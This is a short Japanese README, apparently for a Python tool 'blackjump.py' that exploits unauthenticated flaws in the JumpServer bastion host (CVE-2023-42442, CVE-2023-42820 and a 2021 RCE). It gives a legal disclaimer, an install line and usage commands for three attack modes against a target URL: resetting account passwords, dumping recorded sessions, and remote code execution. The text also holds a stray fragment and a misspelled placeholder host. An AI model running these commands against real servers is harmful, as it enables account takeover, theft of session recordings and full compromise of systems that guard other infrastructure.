
JumpServer 要塞機の未認可総合脆弱性悪用, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021
免責事項: 本ツールは合法的に認可された企業のセキュリティ構築作業を対象としています。本ツールを使用した検出を行う際には、その行為が現地の法律・規制に準拠し、十分な許可を得ていることを確認してください。非認可のターゲットに対して使用しないでください。
本ツールの使用中に違法行為があった場合、その結果はすべて利用者が負うものとし、当方は一切の法的責任および関連責任を負いません。
JumpServer バスティオンホスト統合エクスプロイト
python3 -m pip install -r requirements.txt
--user および --email パラメータを指定できます。python3 blackjump.py reset https://vulerability

output/ ディレクトリ内の <uuid4>.tar ファイルを jumpserverプレイヤーで再生 してください。python3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h